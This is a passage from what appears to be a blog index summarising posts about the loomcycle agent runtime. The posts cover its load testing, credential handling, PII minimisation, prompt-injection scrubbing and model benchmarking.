RunInputs,on_completehooks deliver via channel / memory / MCP, per-user forks carry their own credentials map from RFC F. The compound stress test pushed it from 100 to 100,000 fires in one test process and surfaced a real double-fire race at x30,000: every schedule fired exactly twice becauseRecordResulttook longer than the tick interval and the sweeper had no in-flight guard. Closed by async.Maptracker (PR #272); curve now linear through x50,000. Zero credential mismatches across 200,000+ MCP calls in the sweep. -
Reliable under stress, sustainable for hours: seven load experiments in two days
Yesterday's post ended on a promissory note - cluster, Linux, sustained. Two days, seven experiments, ~280,000 circuits later, this post cashes it. Single-binary Linux baseline (p99 = 4.0 s). The cluster's sharp r=2 → r=3 phase transition (p99 collapses 15× as the load splits below the per-replica saturation knee). Cross-replica cancel ack p99 = 130 ms (38× headroom). Crash reaper at T+20 s,
stop_reason='replica_died'named in the data. Then 15 and 30 minutes of sustained load with zero drift - 109,000 circuits, ~180 runs/sec, load distributed across r=4 within 0.5 %. A capacity ramp perfectly linear to x5000 (slope: 16 s per +1000 circuits). A saturation ramp that finally named the keep-up boundary: between x6000 and x8000. Soft ceiling, not a cliff. -
Three MCP tokens in one run - and the agent never sees a single one
JobEmber.ai's autonomous job-search agent needs three per-user bearer tokens in one run - a jobs API, the user's Slack, the user's Telegram. The v0.8.14 substrate carried one. Handing all three to the agent would leak them into transcripts, OTEL spans, sub-agent contexts, and any prompt-injectable tool result. The fix is the right kind of unsexy: a named credentials map at the wire,
${run.credentials.<name>}substitution at the HTTP boundary, zero agent-visible introspection surface. Shipped today (PR #262); the matching scheduled-runs RFC follows. -
15,000 agents on a synthetic provider - finding loomcycle's real ceiling
Yesterday's run starved on provider quota before it could find loomcycle's own limits. So we built a synthetic LLM provider - same wire shape, zero HTTP, zero quota, deterministic 429 injection - and pushed the substrate to 15,000 agent runs held live in memory, then 1,500 executing in parallel once we lifted the harness gate 10×: 5,000/5,000 complete, zero substrate errors, queue never saturated. Three real bugs found and fixed along the way - and the real bottleneck finally named: pgxpool size and per-op connection queueing, with three fix paths. Charts included.
-
Route agents by data sensitivity: local where it matters, cloud where it doesn't
The honest answer to "can we use agents on sensitive data?" isn't everything-local (quality collapse) or everything-cloud (residency violation) - it's routing by sensitivity. Pin sensitive-data agents to a local model so their data never leaves your box; route everything else to the best cloud model for the job. Per-agent provider policy, operator-controlled, shipped today. Residency you can prove with a packet capture beats a retention promise you have to trust.
-
3000 agents + 2000 memories + 2000 channels in one stress test
100 users × 10 circuits - 7000 entities the v0.12.x substrate tracked cleanly. The agents themselves starved on provider capacity, because Anthropic and Ollama both cap parallel calls at roughly the number we needed at peak. Multi-provider fallback didn't fix it (correlated ceilings). Five real substrate bugs found and shipped the same day. The bottleneck moved from "loomcycle internals" to "upstream provider concurrency limits" - the result an agentic runtime is supposed to produce. Includes the recorded x1000 session.
-
Multi-replica HA - the seven phases that get loomcycle close to v1.0
Seven phases over four weeks took loomcycle from a single-process binary to a multi-replica cluster: Postgres LISTEN/NOTIFY backplane, cluster-wide per-user fairness, cross-replica cancel + pause/resume, advisory-lock singleton sweepers, DB-backed session locks and hooks. Two-replica
docker-composedemo ships in the repo. Not v1.0 yet - load testing and hardening still ahead - but the biggest step toward it. -
What it took to make loomcycle a first-class n8n citizen
@loomcycle/n8n-nodes-loomcyclewent from v1.0.0 to v1.2.0 in four days. Five cluster sub-nodes (including a LangChain Chat Model wired to loomcycle's gateway), two trigger nodes, six example workflows, six action nodes covering Run / Memory / Channel and the AgentDef / SkillDef / MCPServerDef substrate. Plus the Tools Agent integration saga - three patches into the@langchain/core/messages/ai.js:178rejection trail, ending with a defence-in-depth synthetictool_call_idat every wire boundary. -
Becoming OpenAI-shaped without becoming OpenAI
Loomcycle grew an OpenAI-shaped front door this week. Three releases:
POST /v1/_llm/chat(the loomcycle-native gateway, v0.11.0),POST /v1/chat/completions(the Chat Completions shim, v0.11.3), andPOST /v1/embeddings(the Embeddings shim, v0.11.4). Every n8n Chat Model, LangChain consumer, RAG pipeline, and vector DB that defaults to OpenAI now works against your loomcycle. The interesting part is what the shim deliberately doesn't translate. -
Scrubbing the model's incoming mail: a PostTool hook for WebFetch, WebSearch, and Brave
A content-level prompt-injection defence built outside the model. WebFetch, WebSearch, and Brave Search results now pass through a PostTool hook that scrubs sixteen injection patterns plus Cyrillic-homoglyph variants before reaching the agent's context. The interesting parts: LIFO ordering with url-discovery,
fail_mode: closed, and the JSON-nesting bypass we shipped and closed within two hours. -
When the agent is in one container and its definition is in another
The historical loomcycle pattern read
.claude/agents/*.mdoff a shared filesystem checkout. That dies the moment the runtime and the app run in independent containers. We solved it with a substrate trio - AgentDef, SkillDef, MCPServerDef - each content-addressed by SHA-256 over a fixed set of fields, pushed at boot from the consumer's image, resolved through one canonical lookup. With the cleanup-PR story of why the hash had to move from consumer-side to server-side. -
Even with no-training contracts, the LLM should never see your name
Anthropic's no-training tier is a promise about retention, not a reduction of what gets sent. We rebuilt the JobEmber.ai data path so identifying PII never reaches the LLM at all - placeholders for names, emails, phones, and addresses; server-side comparison for location preferences via a narrow MCP tool - and dropped
ReadandHTTPfrom every agent that didn't strictly need them. -
What tools should an agent reading attacker HTML get? None.
Companion piece to the PII post. The
job-posting-parseragent runs against attacker-controllable third-party HTML and was built for the smallest-possible blast radius: zero tools, zero secrets, tag-wrapped inputs, Zod-strict output. Each invariant covers a different failure mode; none is sufficient alone. Frames a future deep-dive on content-level prompt-injection defence. -
Who decides which URLs an agent can visit? It's not the runtime.
A Sunday-afternoon production-deploy test caught a structural gap: agents that find URLs via
WebSearchcan't fetch them, because the URL allowlist is pre-enumerated and discovery isn't. The runtime doesn't have the context to make the per-URL call - only the consumer service does. We extended Pre-hooks with per-call host widening (v0.8.17), moving the decision out of loomcycle while keeping the security boundary intact. -
The final bench scoreboard - 25 models, $21.92, all CAPABLE
Sweep #6 with v3 cases + multi-judge consensus across three provider families. Every model passed. The real signal moved to cost-per-pass and overall-pass count.
ollama/deepseek-v4-protopped both quality (0.91 semantic) and price ($0.0022/pass) - beating opus at 1/75 the cost. Anthropic models are now the three most expensive in the 25-model field. -
How we selected agent- and tool-capable models with our own benchmark
We ran a benchmark sweep across five providers to find models suitable for agentic tool-calling - and discovered, four sweeps in, that the bench harness itself had a bug invalidating most of our conclusions. Here's what we learned, what the corrected findings actually say, and what's going into v2 of the bench.
-
Our MCP server authenticated everyone as me
We added MCP to fix one auth leak - typed schemas, bearer tokens out of the model's view - and quietly created another. The shared developer bearer that authorized our MCP server resolved every user's agent calls to my user_id. Documents got linked to the wrong user. The bug took a stretch of days and a persistent second user to find. Here's the story and the per-run bearer mechanism (v0.8.14) that fixed it.
-
How I burned $80 on Claude Code in a Sunday afternoon
A parallel-spawn loop. 100
claude code --printinstances. MacBook Pro M1 fan at maximum. MyANTHROPIC_API_KEYinherited viaexecve. Opus 4.7 on a dumb classification task. The bill: $80. Anthropic's robot denied reimbursement. The architectural lesson became loomcycle.